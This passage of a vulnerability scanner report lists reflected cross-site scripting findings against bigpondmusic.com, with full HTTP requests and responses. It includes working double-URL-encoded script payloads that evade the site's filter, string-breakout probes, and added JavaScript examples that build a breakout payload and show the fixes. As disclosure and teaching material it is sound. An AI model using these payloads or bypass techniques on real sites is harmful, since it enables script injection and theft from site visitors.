<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header664ab"><script>alert(1)</script>a352504a772/adh.html" />
...[SNIP]...

2.194. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6c89'%3bfd2f58241 was submitted in the REST URL parameter 2. This input was echoed as e6c89';fd2f58241 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/headere6c89'%3bfd2f58241/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87860


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
st,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'headere6c89';fd2f58241';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.pro
...[SNIP]...

2.195. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6ce5'%3b3ca787e9e3c was submitted in the REST URL parameter 3. This input was echoed as b6ce5';3ca787e9e3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf/header/adh.htmlb6ce5'%3b3ca787e9e3c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
straglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'header';
   s.prop5 = 'adh.htmlb6ce5';3ca787e9e3c';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...

2.196. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf was submitted in the REST URL parameter 3. This input was echoed as eed67"><script>alert(1)</script>ee34394dbaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header/adh.htmleed67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee34394dbaf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/header/adh.htmleed67"><script>alert(1)</script>ee34394dbaf" />
...[SNIP]...

2.197. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3 was submitted in the REST URL parameter 1. This input was echoed as e9ce7"><script>alert(1)</script>5240436d2f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphfe9ce7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5240436d2f3/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphfe9ce7"><script>alert(1)</script>5240436d2f3/res/js/bphf_menu.js" />
...[SNIP]...

2.198. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5936'%3b1c8e57db835 was submitted in the REST URL parameter 1. This input was echoed as a5936';1c8e57db835 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphfa5936'%3b1c8e57db835/res/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphfa5936';1c8e57db835';
   s.prop4 = 'res';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel
...[SNIP]...

2.199. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89 was submitted in the REST URL parameter 2. This input was echoed as 1fa67"><script>alert(1)</script>84ddb0ecf89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/res1fa67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84ddb0ecf89/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res1fa67"><script>alert(1)</script>84ddb0ecf89/js/bphf_menu.js" />
...[SNIP]...

2.200. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db736'%3bb0de1f819 was submitted in the REST URL parameter 2. This input was echoed as db736';b0de1f819 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
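The script-context problem in 2.198 and 2.200 is easier to reason about with the page's pattern reconstructed and run through a real JavaScript parser. The following is an added example, not code from the XSS.CX report or from the bigpondmusic.com site: the s.prop4 template mirrors the analytics line in the report's response, while the function names and the weaponised payload are assumptions. It shows that the report's probe terminates the literal (the page no longer parses), that a follow-on payload can run its own statement, and that encoding for the JavaScript string context removes both outcomes.

```javascript
// Added example, not code from the XSS.CX report or from bigpondmusic.com: why the
// single-quoted JavaScript string in findings 2.198 and 2.200 is dangerous, and how to
// encode for that context. The template reconstructs the s.prop4 line from the report's
// response; the function names and the weaponised payload are assumptions.

// The page's pattern: the URL segment spliced raw into a single-quoted literal.
function analyticsVulnerable(segment) {
  return `s.prop4 = '${segment}';`;
}

// JavaScript string-literal encoder: every character outside [A-Za-z0-9] becomes \xHH
// (or \uHHHH above U+00FF), so quotes, backslashes, newlines and "</script>" can never
// alter the parse, whichever quote style the template uses.
function jsStringEncode(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    if (/[A-Za-z0-9]/.test(ch)) {
      out += ch;
    } else if (cp <= 0xff) {
      out += '\\x' + cp.toString(16).padStart(2, '0');
    } else {
      // Astral code points arrive as one ch; emit each UTF-16 unit separately.
      out += ch.split('').map(u => '\\u' + u.charCodeAt(0).toString(16).padStart(4, '0')).join('');
    }
  }
  return out;
}

// Hardened template: same shape, value encoded for the JavaScript string context.
function analyticsHardened(segment) {
  return `s.prop4 = '${jsStringEncode(segment)}';`;
}

// Parse and run the generated statement the way a browser would, returning the
// resulting s object, or the class of error if the statement does not even parse.
function evaluateAssignment(statement) {
  try {
    const run = new Function('const s = {};\n' + statement + '\nreturn s;');
    return { ok: true, s: run() };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

// The report's probe for REST URL parameter 2, as it reads once URL-decoded.
const PROBE = "resdb736';b0de1f819";
// A constructed follow-on payload that closes the literal and runs a statement of its own.
const WEAPONISED = "x';s.pwned=1;//";

function demo() {
  return {
    probeVulnerable: evaluateAssignment(analyticsVulnerable(PROBE)),          // ok: false, SyntaxError
    weaponisedVulnerable: evaluateAssignment(analyticsVulnerable(WEAPONISED)), // s.pwned === 1
    weaponisedHardened: evaluateAssignment(analyticsHardened(WEAPONISED)),     // s.prop4 is the raw text, no pwned
  };
}

console.log(demo());
```

The scanner's "Firm" confidence corresponds to the first case: the probe breaks the literal but the page as a whole stops parsing, so nothing executes until an attacker finishes the statement, as the second case does. The encoder deliberately escapes far more than the quote character because a single-quote-only escape still leaves backslash, newline and a closing script tag as ways out of the literal.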

Request

GET /bphf/resdb736'%3bb0de1f819/js/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
lhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf';
   s.prop4 = 'resdb736';b0de1f819';
   s.prop5 = 'js';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '
...[SNIP]...

2.201. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/res/js/bphf_menu.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116 was submitted in the REST URL parameter 3. This input was echoed as 7016f"><script>alert(1)</script>331eb61f116 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
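Findings 2.197, 2.199 and 2.201 all describe the same ordering flaw: a character check runs on the once-decoded path segment, then the application decodes it a second time and writes the result into a double-quoted attribute. The following is an added example, not code from the XSS.CX report or from the bigpondmusic.com application: the handler names, the character blocklist and the page template are assumptions, and the attribute line mirrors the parentUrl input shown in the report's responses. It reproduces the %253c bypass against the vulnerable ordering and shows the remediation the report recommends (no second decode, validation on the canonical value) together with output encoding for the attribute context.

```javascript
// Added example, not code from the XSS.CX report or from bigpondmusic.com: a model of
// the decode/validate ordering flaw behind findings 2.197, 2.199 and 2.201. The
// handler names, the character blocklist and the page template are assumptions;
// the attribute line mirrors the parentUrl input shown in the report's responses.

// One percent-decode, as the web server applies to the path before the application runs.
function serverDecode(rawPath) {
  return decodeURIComponent(rawPath);
}

// Naive check for characters "often used in XSS attacks".
function looksDangerous(s) {
  return /[<>"']/.test(s);
}

// Output encoder for a double-quoted HTML attribute value.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable: validates the once-decoded segment, then decodes it AGAIN and writes the
// result raw. %253c reaches the check as the harmless text "%3c"; the second decode
// turns it into "<" after validation has already run.
function renderVulnerable(rawPath) {
  const seg = serverDecode(rawPath).split('/')[1]; // REST URL parameter 1
  if (looksDangerous(seg)) return 'HTTP/1.1 400 Bad Request';
  const twiceDecoded = decodeURIComponent(seg);
  return `<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/${twiceDecoded}/res/js/bphf_menu.js" />`;
}

// Hardened: no second decode (the server's single decode is the canonical form),
// validation on that canonical value, and context-specific output encoding so the
// attribute stays intact even if validation lets something through.
function renderHardened(rawPath) {
  const seg = serverDecode(rawPath).split('/')[1];
  if (looksDangerous(seg)) return 'HTTP/1.1 400 Bad Request';
  return `<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/${htmlAttrEncode(seg)}/res/js/bphf_menu.js" />`;
}

// Did a live script tag land in the markup?
function injected(html) {
  return html.includes('<script>alert(1)</script>');
}

// The report's double-encoded probe for REST URL parameter 1 (random marker strings dropped).
const DOUBLE_ENCODED = '/bphf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e/res/js/bphf_menu.js';
// The same probe single-encoded, which the blocklist does catch.
const SINGLE_ENCODED = '/bphf%22%3e%3cscript%3e%3c%2fscript%3e/res/js/bphf_menu.js';

function demo() {
  return {
    singleEncodedVulnerable: renderVulnerable(SINGLE_ENCODED),          // 400: blocklist fires
    doubleEncodedVulnerable: injected(renderVulnerable(DOUBLE_ENCODED)), // true: bypassed
    doubleEncodedHardened: injected(renderHardened(DOUBLE_ENCODED)),     // false
  };
}

console.log(demo());
```

The blocklist is kept in the hardened handler only to match the report's wording about validating after canonicalisation; the property that actually closes the hole is that the value written into the attribute is the canonical one and is encoded for that context, so a second decode never happens and a quote or angle bracket that survives validation cannot end the attribute.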

Request

GET /bphf/res/js7016f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e331eb61f116/bphf_menu.js HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf/res/js7016f"><script>alert(1)</script>331eb61f116/bphf_menu.js" />
...[SNIP]...

2.202. http://bigpondmusic.com/bphf/res/js/bphf_menu.js [REST URL parameter 3]

Summary

Severity:   High